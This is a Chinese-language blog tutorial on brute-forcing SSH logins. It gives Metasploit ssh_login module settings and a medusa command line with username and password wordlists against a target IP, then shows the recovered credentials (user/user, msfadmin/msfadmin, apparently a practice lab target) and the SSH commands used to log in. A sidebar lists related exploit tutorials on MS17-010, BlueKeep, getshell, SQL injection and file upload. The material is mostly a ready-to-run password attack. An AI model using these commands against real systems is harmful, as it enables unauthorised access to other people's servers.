一个用户字典,一个密码字典,也可以一个字典同时当用户名和密码用。可以在创建一个目录并创建这两个字典 (mkdir /tools/zidian ; touch /tools/zidian/ssh_user.txt ; touch /tools/zidian/ssh_pass.txt) 字典内容随心所欲,但是如果字典太大,可能会造成暴力破解时间过长。不过可以大大增加成功率。

#ssh暴力破解有两种方法#

一是使用metasploit
搜索 (search)ssh_login 这个工具进行暴力破解,需要设置用户名字典 set USER_FILE /tools/zidian/ssh_user.txt 和密码字典 set PASS_FILE /tools/zidian/ssh_pass.txt 最重要的是设置目标IP set RHOST 192.168.1.1还有设置一下线程 set THREADS 1000(根据自己电脑性能设置) 最后运行 run 。。开始暴力破解。

第二种方法是使用 medusa 爆破工具
-l指定地址 、-U 指定用户字典 - P指定密码字典 -M 选择爆破类型。
使用方法: medusa -h 192.168.1.1 -U /tools/zidian/ssh_user.txt -P /tools/zidian/ssh_pass.txt -M ssh

OK ,可以看出,爆破出了两个账号和密码。一个是 user user 一个是 msfadmin msfadmin 然后可以登录一下ssh 指定用户登录方法 ssh -l user(或是msfadmin)192.168.1.1 回车后输入密码后登录

不指定用户:

指定用户:

ssh -l user 192.168.1.1
ssh user@192.168.1.1

如果修改过ssh登录端口的可以:

ssh -p 12333 192.168.1.1
ssh -l user -p 12333 192.168.1.1
 ssh -p 12333 user@192.168.1.1
相关文章
评论
分享
  • 利用ms17_010漏洞攻陷windows server 2012服务器

    这几天给客户装了好多服务器,很多系统是windows server 2012 R2的,装完后也没有打补丁,然后我就对这个没打补丁的系统扫了一下还真发现了高危漏洞。(比较简单,不喜勿喷) 首先自己搭建的环境:kali linux (19...

    利用ms17_010漏洞攻陷windows server 2012服务器
  • CVE-2019-0708漏洞利用

    CVE-2019-0708漏洞利用9月7日上午,群里被CVE-2019-0708漏洞刷屏,原来是那个号称wannacry级别的漏洞 BlueKeep(CVE-2019-0708)漏洞利用发布了。吓得老夫赶紧打开虚拟机更新了一下kali...

    CVE-2019-0708漏洞利用
  • 利用php输入流getshell教程

    利用php输入流getshell教程
  • sql注入

    依旧是使用DVWA。。 sql注入初级代码:<?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id'];...

    sql注入
  • PHP文件上传漏洞

    目录: 初级 中级 高级 防护措施 1.初级:上传漏洞很简单,刚刚看完一个多小时的教程心情很是惆怅,决定把老师讲的记下来。依旧是用DVWA这玩意进行练习。先从初级开始,首先分析一下php的源代码: <?php if (is...

    PHP文件上传漏洞